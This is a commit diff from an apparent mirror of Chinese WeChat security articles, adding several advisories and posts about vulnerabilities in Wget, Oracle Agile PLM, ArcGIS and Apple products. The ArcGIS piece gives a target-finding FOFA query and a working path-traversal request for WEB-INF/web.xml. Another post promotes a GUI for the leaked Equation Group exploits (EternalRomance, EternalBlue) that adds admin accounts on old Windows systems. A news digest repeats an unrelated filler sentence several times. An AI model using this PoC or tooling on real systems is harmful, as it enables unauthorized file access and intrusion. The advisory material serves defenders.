mirror of
https://github.com/gelusus/wxvl.git
synced 2025-07-29 22:14:41 +00:00
【漏洞预警】Oracle Agile PLM框架未授权 可致敏感信息泄露CVE-2024-21287、【漏洞预警】Wget服务器端请求伪造漏洞(CVE-2024-10524)、第105篇:方程式工具包图形界面版V0.42,更新永恒浪漫exp对Vista、Win7系统的利用、网安瞭望台第 2期:零日漏洞密集爆发、2024年常见网络安全漏洞类型及分析、周鸿祎世界互联网大会谈中国大模型发展:应扬长避短 选择自己的道路、「漏洞复现」ArcGIS 地理信息系统 任意文件读取漏洞、苹果紧急修复已遭利用的两个0day、wget 存在SSRF 0day漏洞 CVE-2024-10524、
This commit is contained in:
parent
3bbe9e8b00
commit
4b26e752c0
10
data.json
10
data.json
@ -289,5 +289,13 @@
|
||||
"https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650989812&idx=1&sn=fd1211672ea7e1d7357c9909c7600faa": "【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474)",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzkyMjM5NDM3NQ==&mid=2247486083&idx=1&sn=eb8dc60a736b80cc2bcd90bc76f825b3": "一次黑盒转变白盒前台漏洞审计过程",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649400795&idx=1&sn=99b65e43e266182fd962e758b293c138": "全球数据跨境流动合作倡议",
|
||||
"https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133464&idx=2&sn=16e48bc09bde1b9e2e0b383257d60d2a": "美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览"
|
||||
"https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133464&idx=2&sn=16e48bc09bde1b9e2e0b383257d60d2a": "美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489192&idx=1&sn=663db3924b11641b7c1e483016b43aa4": "【漏洞预警】Oracle Agile PLM框架未授权 可致敏感信息泄露CVE-2024-21287",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489192&idx=2&sn=dbb1fec7e9b1b1be32e557c7e7e93fa4": "【漏洞预警】Wget服务器端请求伪造漏洞(CVE-2024-10524)",
|
||||
"https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247517235&idx=1&sn=15beae174630b436d0b4b755c3b8f7df": "第105篇:方程式工具包图形界面版V0.42,更新永恒浪漫exp对Vista、Win7系统的利用",
|
||||
"https://mp.weixin.qq.com/s?__biz=Mzg2NTkwODU3Ng==&mid=2247512533&idx=1&sn=508123790f0103c1e0b80a86546ebbd6": "网安瞭望台第 2期:零日漏洞密集爆发、2024年常见网络安全漏洞类型及分析",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzA4MTg0MDQ4Nw==&mid=2247576922&idx=1&sn=936ee428e8066709dbf21f8ca640454e": "周鸿祎世界互联网大会谈中国大模型发展:应扬长避短 选择自己的道路",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486082&idx=1&sn=eb2064a0626c65f33ab73a11a0d5ae30": "「漏洞复现」ArcGIS 地理信息系统 任意文件读取漏洞",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247521533&idx=1&sn=1ab7c5da3e583e48ee67d6f50fd4d97e": "苹果紧急修复已遭利用的两个0day",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492578&idx=3&sn=a13cb4917d5870bf3ac1e32ce46bc962": "wget 存在SSRF 0day漏洞 CVE-2024-10524"
|
||||
}
|
54
doc/wget 存在SSRF 0day漏洞 CVE-2024-10524.md
Normal file
54
doc/wget 存在SSRF 0day漏洞 CVE-2024-10524.md
Normal file
@ -0,0 +1,54 @@
|
||||
# wget 存在SSRF 0day漏洞 CVE-2024-10524
|
||||
独眼情报 2024-11-20 07:42
|
||||
|
||||

|
||||
|
||||
流行的 Wget 下载实用程序中新发现的一个漏洞可能允许攻击者发起服务器端请求伪造 (SSRF) 攻击。
|
||||
|
||||
JFrog 的安全研究员 Goni Golan
|
||||
发现了
|
||||
Wget 中的一个漏洞,Wget 是一个广泛使用的从互联网下载文件的命令行工具。该漏洞的编号为 CVE-2024-10524,攻击者可以利用该漏洞诱骗 Wget 向内部或受限服务器发出非预期请求。
|
||||
|
||||
了解漏洞
|
||||
|
||||
该漏洞源于 Wget 对简写 URL 的支持,这是一项旧功能,允许用户在某些情况下省略协议方案(例如“http://”)。然而,攻击者可以利用 Wget 对这些简写 URL 的处理来操纵请求的目的地。
|
||||
|
||||
“我们发现,当使用 HTTP 简写格式和用户提供的输入时,可能会发生意外行为。Wget 可能会向其他主机发出 FTP 请求——可能由攻击者控制的主机或用户通常无法访问的受限主机。此 SSRF 漏洞可以成为多种类型攻击的起点
|
||||
。”
|
||||
|
||||
漏洞利用场景
|
||||
|
||||
Golan 概述了攻击者可能利用此漏洞的几种方式,包括:
|
||||
- SSRF 攻击:
|
||||
通过操纵简写 URL,攻击者可以强制 Wget 向通常无法从互联网访问的内部服务器发送请求。
|
||||
|
||||
- 网络钓鱼攻击:
|
||||
攻击者可以制作看似指向合法网站但实际上将用户重定向到攻击者控制的服务器的恶意链接。
|
||||
|
||||
- 中间人 (MitM) 攻击:
|
||||
攻击者可以将自己置于 Wget 和目标服务器之间,拦截并可能操纵数据。
|
||||
|
||||
- 数据泄露:
|
||||
攻击者可以利用该漏洞获取敏感信息,例如错误日志或内部主机名。
|
||||
|
||||
影响与补救
|
||||
|
||||
该漏洞影响 Wget 1.24.5 及以下所有版本。建议用户更新至
|
||||
1.25.0
|
||||
或更高版本,该版本已修复此问题。
|
||||
|
||||
建议
|
||||
- 更新 Wget:
|
||||
更新 Wget 至最新版本以修复漏洞。
|
||||
|
||||
- 清理用户输入:
|
||||
如果使用 Wget 和用户提供的输入,请仔细清理输入以防止恶意操纵 URL。
|
||||
|
||||
- 避免使用简写 URL:
|
||||
尽可能避免使用简写 URL,并在所有 Wget 请求中明确指定协议方案。
|
||||
|
||||
详细技术分析见:
|
||||
|
||||
https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/
|
||||
|
||||
|
119
doc/「漏洞复现」ArcGIS 地理信息系统 任意文件读取漏洞.md
Normal file
119
doc/「漏洞复现」ArcGIS 地理信息系统 任意文件读取漏洞.md
Normal file
@ -0,0 +1,119 @@
|
||||
# 「漏洞复现」ArcGIS 地理信息系统 任意文件读取漏洞
|
||||
冷漠安全 冷漠安全 2024-11-20 10:18
|
||||
|
||||

|
||||
|
||||
**0x01 免责声明**
|
||||
|
||||
**免责声明**
|
||||
|
||||
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
|
||||
|
||||
0x02
|
||||
|
||||
**产品介绍**
|
||||
|
||||
ArcGIS是由美国Esri公司研发的地理信息系统(GIS)软件,它整合了数据库、软件工程、人工智能、网络技术、云计算等主流的IT技术,旨在为用户提供一套完整的、开放的企业级GIS解决方案,它包含了一套带有用户界面组件的Windows桌面应用。可以实现从简单到复杂的地理信息系统(GIS)任务,如制图、地理分析、数据编辑、数据管理、可视化和空间处理等。
|
||||
|
||||
0x03
|
||||
|
||||
**漏洞威胁**
|
||||
|
||||
ArcGIS地理信息系统 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
|
||||
|
||||
0x04
|
||||
|
||||
**漏洞环境**
|
||||
|
||||
FOFA:
|
||||
```
|
||||
app="esri-ArcGIS"
|
||||
```
|
||||
|
||||

|
||||
|
||||
0x05
|
||||
|
||||
**漏洞复现**
|
||||
|
||||
PoC
|
||||
```
|
||||
GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
```
|
||||
|
||||

|
||||
|
||||
|
||||
0x06
|
||||
|
||||
**批量脚本验证**
|
||||
|
||||
Nuclei验证脚本已发布
|
||||
知识星球:冷漠安全
|
||||
|
||||

|
||||
|
||||
|
||||
0x07
|
||||
|
||||
**修复建议**
|
||||
|
||||
关闭互联网暴露面或接口设置访问权限
|
||||
|
||||
升级至安全版本
|
||||
|
||||
0x08
|
||||
|
||||
**加入我们**
|
||||
|
||||
漏洞详情及批量检测POC工具请前往知识星球获取
|
||||
|
||||
知识星球:冷漠安全交个朋友,限时优惠券:加入立减25星球福利:每天更新最新漏洞POC、资料文献、内部工具等
|
||||
|
||||

|
||||
|
||||
|
||||
「星球介绍」:
|
||||
|
||||
本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。
|
||||
|
||||
本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。
|
||||
|
||||
本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。
|
||||
|
||||
|
||||
「星球服务」:
|
||||
|
||||
|
||||
加入星球,你会获得:
|
||||
|
||||
|
||||
♦ 批量验证漏洞POC脚本
|
||||
|
||||
|
||||
♦ 0day、1day分享
|
||||
|
||||
|
||||
♦ 汇集其它付费星球资源分享
|
||||
|
||||
|
||||
♦ 大量的红蓝对抗实战资源
|
||||
|
||||
|
||||
♦ 优秀的内部红蓝工具及插件
|
||||
|
||||
|
||||
♦ 综合类别优秀Wiki文库及漏洞库
|
||||
|
||||
|
||||
♦ 提问及技术交流
|
||||
|
||||

|
||||
|
||||
|
@ -0,0 +1,9 @@
|
||||
# 【漏洞预警】Oracle Agile PLM框架未授权 可致敏感信息泄露CVE-2024-21287
|
||||
cexlife 飓风网络安全 2024-11-20 13:55
|
||||
|
||||

|
||||
|
||||
**漏洞描述:**
|
||||
|
||||
Oracle Agile PLM (Product Lifecycle Management) Framework是Oracle提供的一种产品生命周期管理解决方案,旨在帮助企业有效地管理产品的整个生命周期,包括从概念设计到生产、分销、售后等所有环节的流程和数据,它帮助企业通过集成产品数据、流程和协作,来提高产品开发的效率、降低成本、确保合规性并加速创新。Oracle发布安全公告,攻击者正在积极利用Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287)获取敏感信息,该漏洞的CVSS评分为7.5。Oracle Agile PLM Framework(组件:Software Development Kit和Pzrocess Extension)中存在信息泄露漏洞,未经身份验证的攻击者可以通过HTTP 访问并利用该漏洞,从而以PLM应用程序使用的权限下载目标系统上可访问的文件,成功利用该漏洞可能导致未授权访问并获取Oracle Agile PLM Framework 中存储的敏感数据或文件。**影响范围:**Oracle Agile PLM Framework版本9.3.6**修复建议:**目前Oracle已发布了该漏洞的补丁,受影响用户可及时更新。**参考链接:**https://www.oracle.com/security-alerts/alert-cve-2024-21287.html
|
||||
|
17
doc/【漏洞预警】Wget服务器端请求伪造漏洞(CVE-2024-10524).md
Normal file
17
doc/【漏洞预警】Wget服务器端请求伪造漏洞(CVE-2024-10524).md
Normal file
@ -0,0 +1,17 @@
|
||||
# 【漏洞预警】Wget服务器端请求伪造漏洞(CVE-2024-10524)
|
||||
cexlife 飓风网络安全 2024-11-20 13:55
|
||||
|
||||

|
||||
|
||||
**漏洞描述:**
|
||||
|
||||
GNU Wget是一个广泛使用的开源命令行工具,主要用于从网络上下载文件,它由GNU项目开发,支持 HTTP、HTTPS和FTP协议,因此可以用于从各种类型的网络服务器获取文件,Wget中存在一个解析不当导致的服务器端请求伪造漏洞(CVE-2024-10524),该漏洞的CVSS评分为6.5,目前该漏洞的技术细节已公开,Wget1.24.5及之前版本中,由于Wget在处理HTTP简写格式URL时解析不当,错误地将包含冒号(:)的用户输入解析为FTP请求,导致将原本应为HTTP请求的URL错误地解析为FTP请求,攻击者可通过控制简写URL中的用户信息部分(例如malwaredomain:aaa@reliableserver)来改变请求目标,从而将请求发送到恶意服务器,该漏洞可能导致服务器端请求伪造攻击、钓鱼攻击、MITM(中间人)攻击和数据泄露等。
|
||||
|
||||
**影响范围:**Wget <= 1.24.5**修复建议:**目前该漏洞已经修复,受影响用户可升级到Wget 1.25.0或更高版本。**下载链接:**https://mirror.team-cymru.com/gnu/wget/wget-1.25.0.tar.gz**临时措施:**
|
||||
|
||||
暂无
|
||||
|
||||
**参考链接:**
|
||||
|
||||
https://seclists.org/oss-sec/2024/q4/107
|
||||
|
69
doc/周鸿祎世界互联网大会谈中国大模型发展:应扬长避短 选择自己的道路.md
Normal file
69
doc/周鸿祎世界互联网大会谈中国大模型发展:应扬长避短 选择自己的道路.md
Normal file
File diff suppressed because one or more lines are too long
76
doc/第105篇:方程式工具包图形界面版V0.42,更新永恒浪漫exp对Vista、Win7系统的利用.md
Normal file
76
doc/第105篇:方程式工具包图形界面版V0.42,更新永恒浪漫exp对Vista、Win7系统的利用.md
Normal file
@ -0,0 +1,76 @@
|
||||
# 第105篇:方程式工具包图形界面版V0.42,更新永恒浪漫exp对Vista、Win7系统的利用
|
||||
Z2O安全攻防 2024-11-20 13:48
|
||||
|
||||

|
||||
##
|
||||
## Part1 前言
|
||||
|
||||
**大家好,我是ABC_123**
|
||||
。本期继续为大家分享我在2018年左右开始编写的,方程式工具包中各种Windows远程溢出漏洞的图形界面版。此次更新基于对美国NSA原版的方程式工具包命令行参数的新发现,优化多个参数,修复多处bug,**增加“永恒浪漫”、“永恒冠军”的利用成功率,减少蓝屏现象的发生**
|
||||
。
|
||||
|
||||
**注:**
|
||||
方程式工具包的针对Windows系统的各种溢出漏洞,有很多使用技巧,所以我在制作图形界面的时候,综合考虑了漏洞利用的各种情况,把很多功能细化了、定制化了。
|
||||
|
||||
**注:文末有工具的下载地址及使用教程。**
|
||||
|
||||
****## Part2 技术研究过程
|
||||
|
||||
该图形界面版工具的初步使用教程,在我的《[第89篇:方程式工具包远程溢出漏洞图形界面版V0.3(内置永恒之蓝、永恒冠军、永恒浪漫等)](http://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247486631&idx=1&sn=cfc3a59792191fcc5ad2d86992bc7b20&chksm=c25fc3dcf5284aca8b11e081e5219952b4c3278a3b4c2f3fb3756d4bec905b06f3dc11e08bea&scene=21#wechat_redirect)
|
||||
》这篇文章中有详细介绍,本篇文章继续介绍针对不同操作系统,应该具体选用哪一种EXP来利用。
|
||||
|
||||
**对于Vista操作系统**
|
||||
:可选择永恒浪漫、永恒冠军来利用。如下图所示,原版的永恒之蓝是不支持该系统的。
|
||||
|
||||

|
||||
|
||||
|
||||
如下图所示,使用该图形版工具对Vista系统利用成功,成功添加了admin01账号。
|
||||
|
||||

|
||||
|
||||
|
||||
**对于Win7 专业版操作系统**
|
||||
:经过测试发现,**无论如何调整参数,目标操作系统都会在几分钟内重启**
|
||||
。目前最好的用于实战的方式还是添加系统账号密码,如果目标操作系统重启,仍然可以使用添加的账号密码进行远程登录,重新获取权限。如下图所示,对于Win7操作系统,永恒之蓝可用。
|
||||
|
||||

|
||||
|
||||
|
||||
**对于Win2003操作系统**
|
||||
:
|
||||
需要使用永恒浪漫、永恒冠军来测试,原版的永恒之蓝是不支持win2003的,这里需要大家注意。
|
||||
|
||||

|
||||
|
||||
|
||||
**对于WinXP操作系统**
|
||||
:永恒之蓝、永恒
|
||||
浪漫、永恒冠军均可使用,**在3种exp均能支持的情况下,建议首选永恒浪漫及永恒冠军,利用更加稳定,而不是永恒之蓝**
|
||||
。
|
||||
|
||||

|
||||
|
||||
|
||||
**对于Win2000操作系统**
|
||||
:原版方程式工具包提示4种exp都不支持,但是仍然可以手工尝试选择**Eclipsedwing(MS08-067)**
|
||||
、永恒之蓝进行测试。
|
||||
|
||||

|
||||
|
||||
|
||||
**对于域内Win2003的3389端口溢出**
|
||||
:对于域内主机win2003的3389远程溢出漏洞的利用,由于需要开启智能卡功能,后续会开放对此exp的利用功能。
|
||||
|
||||

|
||||
|
||||
## Part3 总结
|
||||
|
||||
后台回复 “
|
||||
**方程式**
|
||||
”
|
||||
即可得到此工具的下载地址及使用教程。
|
||||
|
||||
****
|
||||
|
||||
|
250
doc/网安瞭望台第 2期:零日漏洞密集爆发、2024年常见网络安全漏洞类型及分析.md
Normal file
250
doc/网安瞭望台第 2期:零日漏洞密集爆发、2024年常见网络安全漏洞类型及分析.md
Normal file
@ -0,0 +1,250 @@
|
||||
# 网安瞭望台第 2期:零日漏洞密集爆发、2024年常见网络安全漏洞类型及分析
|
||||
原创 扬名堂 东方隐侠安全团队 2024-11-20 12:20
|
||||
|
||||
网安资讯分享
|
||||
|
||||
DAILY NEWS AND KNOWLEDGE
|
||||
|
||||
新鲜资讯&知识 抢先了解
|
||||
|
||||
隐侠安全客栈
|
||||
|
||||
**国内外要闻**
|
||||
|
||||
|
||||
**Ubuntu 服务器 Needrestart 软件包惊现严重安全漏洞**
|
||||
|
||||
|
||||
|
||||
|
||||
近日,Ubuntu 服务器(自 21.04 版本起默认安装)的 Needrestart 软件包被曝存在多个可追溯至数十年前的安全漏洞。这些漏洞允许本地攻击者在无需用户交互的情况下获取根权限,严重威胁系统安全。
|
||||
|
||||
Qualys 威胁研究部门(TRU)于上月初发现并报告了这些漏洞,其表示漏洞极易被利用,相关用户需尽快采取行动修复。这些漏洞被认为自 2014 年 4 月 27 日 Needrestart 0.8 版本引入解释器支持时就已存在。
|
||||
|
||||
此次披露的安全漏洞共五个,包括三个可通过控制环境变量(如 PYTHONPATH 和 RUBYLIB)使 Needrestart 运行特定解释器从而执行任意代码的漏洞(CVE - 2024 - 48990、CVE - 2024 - 48991、CVE - 2024 - 48992),以及两个利用 libmodule - scandeps - perl 软件包(1.36 版本之前)问题执行任意 shell 命令的漏洞(CVE - 2024 - 11003、CVE - 2024 - 10224)。
|
||||
|
||||
Ubuntu 官方已在 3.8 版本中修复了这些漏洞,并建议用户尽快下载最新补丁。同时,官方也提供了临时缓解措施,即用户可在 Needrestart 配置文件中禁用解释器扫描器,但在更新应用后需恢复原设置。
|
||||
|
||||
安全专家警告,攻击者若成功利用这些漏洞,将可获取系统根访问权限,进而破坏系统的完整性与安全性,影响涉及 Ubuntu 在内的多个 Linux 发行版,广大用户及相关系统管理员务必高度重视并及时处理。
|
||||
|
||||

|
||||
|
||||
16日,吉林舒兰灾后住房重建(修缮)工作已启动,舒兰市已统计需要重建的受灾户924户,预计10月20日前完成所有受灾户的住房安置工作。。
|
||||
|
||||
**Apple 紧急发布更新修复已遭利用的零日漏洞******
|
||||
|
||||
|
||||
近日,苹果公司针对 iOS、iPadOS、macOS、visionOS 及其 Safari 浏览器发布了安全更新,旨在修复两个正在被野外恶意利用的零日漏洞。
|
||||
|
||||
这两个漏洞具体如下:
|
||||
|
||||
|
||||
- CVE - 2024 - 44308:存在于 JavaScriptCore 中的漏洞,在处理恶意网页内容时可能导致任意代码执行。
|
||||
|
||||
|
||||
- CVE - 2024 - 44309:WebKit 中的 cookie 管理漏洞,在处理恶意网页内容时可能引发跨站脚本(XSS)攻击。
|
||||
|
||||
苹果公司表示,已分别通过改进检查机制和状态管理来修复 CVE - 2024 - 44308 与 CVE - 2024 - 44309 漏洞。尽管目前关于漏洞利用的具体细节尚不清楚,但苹果已确认这两个漏洞“可能已在基于英特尔的 Mac 系统上被积极利用”。
|
||||
|
||||
谷歌威胁分析小组(TAG)的克莱门特·勒西涅(Clément Lecigne)和贝努瓦·塞文斯(Benoît Sevens)因发现并报告这两个漏洞而受到赞誉,这表明这些漏洞可能被用于高度针对性的政府支持或雇佣间谍软件攻击。
|
||||
|
||||
此次更新适用于以下设备和操作系统:
|
||||
|
||||
|
||||
- iOS 18.1.1 和 iPadOS 18.1.1:适用于 iPhone XS 及更新机型、iPad Pro 13 英寸、iPad Pro 12.9 英寸第三代及更新机型、iPad Pro 11 英寸第一代及更新机型、iPad Air 第三代及更新机型、iPad 第七代及更新机型以及 iPad mini 第五代及更新机型。
|
||||
|
||||
|
||||
- iOS 17.7.2 和 iPadOS 17.7.2:适用于 iPhone XS 及更新机型、iPad Pro 13 英寸、iPad Pro 12.9 英寸第二代及更新机型、iPad Pro 10.5 英寸、iPad Pro 11 英寸第一代及更新机型、iPad Air 第三代及更新机型、iPad 第六代及更新机型以及 iPad mini 第五代及更新机型。
|
||||
|
||||
|
||||
- macOS Sequoia 15.1.1:适用于运行 macOS Sequoia 的 Mac 电脑。
|
||||
|
||||
|
||||
- visionOS 2.1.1:适用于 Apple Vision Pro。
|
||||
|
||||
|
||||
- Safari 18.1.1:适用于运行 macOS Ventura 和 macOS Sonoma 的 Mac 电脑。
|
||||
|
||||
今年以来,苹果已累计修复了四个零日漏洞,其中包括在 Pwn2Own 温哥华黑客竞赛中被展示利用的 CVE - 2024 - 27834 漏洞,另外三个漏洞分别在 2024 年 1 月和 3 月得到修复。苹果公司建议用户尽快将设备更新至最新版本,以防范潜在的安全威胁。
|
||||
|
||||
|
||||

|
||||
|
||||
16日,吉林舒兰灾后住房重建(修缮)工作已启动,舒兰市已统计需要重建的受灾户924户,预计10月20日前完成所有受灾户的住房安置工作。。
|
||||
|
||||
### Oracle 警告 Agile PLM 高危漏洞遭在野利用
|
||||
|
||||
|
||||
近日,Oracle 发出警告,其 Agile 产品生命周期管理(PLM)框架存在一个高严重性安全漏洞,且已在野外被恶意利用。
|
||||
|
||||
该漏洞编号为 CVE - 2024 - 21287(CVSS 评分:7.5),攻击者无需身份验证即可利用此漏洞泄露敏感信息。Oracle 在一份公告中表示:“此漏洞可在无需身份验证的情况下被远程利用,也就是说,可通过网络在无用户名和密码的情况下被利用。若成功利用,可能导致文件泄露。”
|
||||
|
||||
网络安全研究人员 Joel Snape 和 Lutz Wolf 因发现并报告该漏洞而受到赞誉。目前,关于谁在利用此漏洞、恶意活动的目标以及攻击的广泛程度等信息均暂未可知。
|
||||
|
||||
Oracle 安全保障副总裁 Eric Maurice 称:“若漏洞被成功利用,未授权的攻击者可从目标系统下载在 PLM 应用程序所使用权限下可访问的文件。”
|
||||
|
||||
鉴于该漏洞已被积极利用,建议用户尽快应用最新补丁以获得最佳防护。《黑客新闻》已联系 Oracle 和 CrowdStrike 征求意见,若收到回复将更新此报道。
|
||||
|
||||

|
||||
|
||||
|
||||
16日,吉林舒兰灾后住房重建(修缮)工作已启动,舒兰市已统计需要重建的受灾户924户,预计10月20日前完成所有受灾户的住房安置工作。。
|
||||
16日,吉林舒兰灾后住房重建(修缮)工作已启动,舒兰市已统计需要重建的受灾户924户,预计10月20日前完成所有受灾户的住房安置工作。。
|
||||
|
||||
### 爱尔兰网络改进资助:企业网络安全的有力后盾
|
||||
|
||||
在当今数字化时代,网络安全对于企业的生存与发展至关重要。爱尔兰企业局推出的网络改进资助项目,犹如一盏明灯,为企业照亮了网络安全防护之路。
|
||||
|
||||
该资助项目是在企业完成网络安全审查后进一步强化安全的关键举措。资助金额上限为 6 万欧元,其中 80%由资助方承担,极大地减轻了企业的经济负担。申请截止时间为 2024 年 12 月 8 日,且项目需在 2025 年 6 月 30 日前完成实施与报销流程,时间安排紧凑有序。
|
||||
|
||||
其涵盖的服务全面且深入。在软件与许可证方面,企业可获取如安全补丁等关键工具,及时填补漏洞。咨询与顾问服务能引入专业智慧,助力企业精准决策,从合规遵循到软件选型都有专业指导。员工培训则着眼于提升全员网络安全意识,让每一位员工都成为网络安全防线的守护者。
|
||||
|
||||
从预期成果来看,企业的网络安全态势将得到显著改善,能够有效抵御已知威胁并灵活应对新兴风险。众多行业面临严格的监管要求,该资助有助于企业轻松达标,避免因违规而遭受罚款或法律纠纷。通过实施多因素认证、防火墙部署等先进控制手段,长期的网络攻击风险得以缓解。同时,完善的事件响应计划能在安全事件发生时迅速反应,减少停机时间与财务损失,并且后续的评估还能进一步验证安全工作的成效。
|
||||
|
||||
一句话总结下,爱尔兰网络改进资助项目为企业提供了难得的机遇与强大的支持,让企业在复杂多变的网络环境中得以稳健前行,为未来的可持续发展奠定坚实的网络安全基石。
|
||||
|
||||

|
||||
|
||||
|
||||
16日,吉林舒兰灾后住房重建(修缮)工作已启动,舒兰市已统计需要重建的受灾户924户,预计10月20日前完成所有受灾户的住房安置工作。。
|
||||
16日,吉林舒兰灾后住房重建(修缮)工作已启动,舒兰市已统计需要重建的受灾户924户,预计10月20日前完成所有受灾户的住房安置工作。。
|
||||
|
||||
### 大学网络安全课程课前声明引争议
|
||||
|
||||
近日,有消息称某大学的网络安全专业学生被要求填写一份声明,承诺不会利用所学技能实施网络犯罪。
|
||||
据悉,该要求自 2017 年起在部门协商后开始实施。
|
||||
然而,大学方面表示没有关于该文件实施的具体记录信息。
|
||||
|
||||
令人关注的是,并没有其他专业或课程的学生被要求做出类似声明,只有网络安全专业的学生需要完成这份声明。
|
||||
此外,虽然学生被要求填写声明,但大学工作人员并不需要填写这份特定的声明,他们只需作为职业责任的一部分参加强制性的网络安全培训。
|
||||
|
||||
这一情况引起了一些争议,有声音表示失望,认为这种要求对网络安全专业的学生似乎不太公平。
|
||||
究竟为何只有网络安全专业的学生需要做出这样的声明,这一问题引发了人们的思考。
|
||||
|
||||
|
||||

|
||||
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
|
||||
**知识分享**
|
||||
|
||||
|
||||
**2024年常见网络安全漏洞类型及分析**
|
||||
|
||||
|
||||
在网络安全领域,了解各种常见的漏洞类型对于保护系统和数据至关重要。
|
||||
下面为大家介绍一些主要的网络安全漏洞类型,这些信息基于 CVEdetails.com 提供的 CVE 统计数据。
|
||||
|
||||
一、文件包含漏洞(File Inclusion)
|
||||
|
||||
文件包含漏洞占比高达 39.61%,是一种较为常见且危害较大的漏洞类型。
|
||||
攻击者可以利用此漏洞包含恶意文件,从而获取敏感信息、执行任意代码或控制服务器。
|
||||
例如,通过构造特定的请求,让服务器包含攻击者指定的外部文件,可能导致服务器执行恶意脚本。
|
||||
|
||||
|
||||
二、SQL 注入(SQL Injection)
|
||||
|
||||
占比 14.37%的 SQL 注入漏洞也是一个重大威胁。
|
||||
攻击者通过在输入数据中插入恶意的 SQL 语句,欺骗数据库服务器执行这些语句,从而获取、修改或删除数据库中的数据。
|
||||
这可能导致敏感信息泄露、数据被篡改甚至整个数据库被控制。
|
||||
|
||||
|
||||
三、服务器端请求伪造(Server-Side Request Forgery,SSRF)
|
||||
|
||||
SSRF 漏洞占比 7.95%。攻击者可以利用此漏洞让服务器发起伪造的请求,访问内部网络中的其他服务或资源,可能导致敏感信息泄露或进一步的攻击。例如,攻击者可以通过 SSRF 漏洞让服务器访问内部的管理接口或其他受限资源。
|
||||
|
||||
|
||||
四、跨站请求伪造(Cross Site Request Forgery,CSRF)
|
||||
|
||||
CSRF 漏洞占比 11.34%。
|
||||
攻击者利用此漏洞诱导用户在已登录的状态下执行恶意操作,而用户往往在不知情的情况下完成这些操作。
|
||||
例如,攻击者可以构造一个恶意链接,当用户点击该链接时,会在用户的浏览器上自动执行一些对目标网站的恶意请求。
|
||||
|
||||
|
||||
五、XML 外部实体注入(Entry injection - XXE)
|
||||
|
||||
XXE 漏洞占比 0.57%。攻击者可以通过此漏洞读取服务器上的任意文件、执行命令或进行拒绝服务攻击。例如,攻击者可以在 XML 输入中引入外部实体,让服务器解析这些实体时执行恶意操作。
|
||||
|
||||
|
||||
六、XML 跨站脚本攻击(XML External Cross Site Scripting,XSS)
|
||||
|
||||
XML XSS 漏洞占比 0.79%。与传统的 XSS 漏洞类似,攻击者可以通过在 XML 数据中插入恶意脚本,当服务器处理这些数据时,恶意脚本会在用户浏览器中执行,从而窃取用户信息或进行其他恶意操作。
|
||||
|
||||
|
||||
七、开放重定向漏洞(Open Redirect)
|
||||
|
||||
开放重定向漏洞占比 1.57%。攻击者可以利用此漏洞将用户重定向到恶意网站,进行钓鱼攻击或传播恶意软件。例如,攻击者可以构造一个看似合法的链接,但实际上会将用户重定向到恶意网站。
|
||||
|
||||
|
||||
八、输入验证漏洞(Validation Input Security Vulnerability)
|
||||
|
||||
输入验证漏洞占比 2.24%。如果对用户输入的数据没有进行充分的验证和过滤,攻击者可以输入恶意数据,从而导致各种安全问题,如 SQL 注入、XSS 攻击等。
|
||||
|
||||
|
||||
九、目录遍历漏洞(Directory Traversal)
|
||||
|
||||
目录遍历漏洞可以让攻击者访问服务器上的任意文件和目录,占比 14.40%。攻击者可以通过构造特定的请求,突破服务器的目录限制,访问敏感文件或系统文件。
|
||||
|
||||
|
||||
了解这些常见的网络安全漏洞类型,有助于开发人员和管理员采取相应的防范措施,加强系统的安全性,保护用户数据和系统的稳定运行。
|
||||
|
||||

|
||||
|
||||
|
||||
16日,吉林舒兰灾后住房重建(修缮)工作已启动,舒兰市已统计需要重建的受灾户924户,预计10月20日前完成所有受灾户的住房安置工作。。
|
||||
|
||||
**深入了解安全信息与事件管理系统(SIEM)**
|
||||
|
||||
|
||||
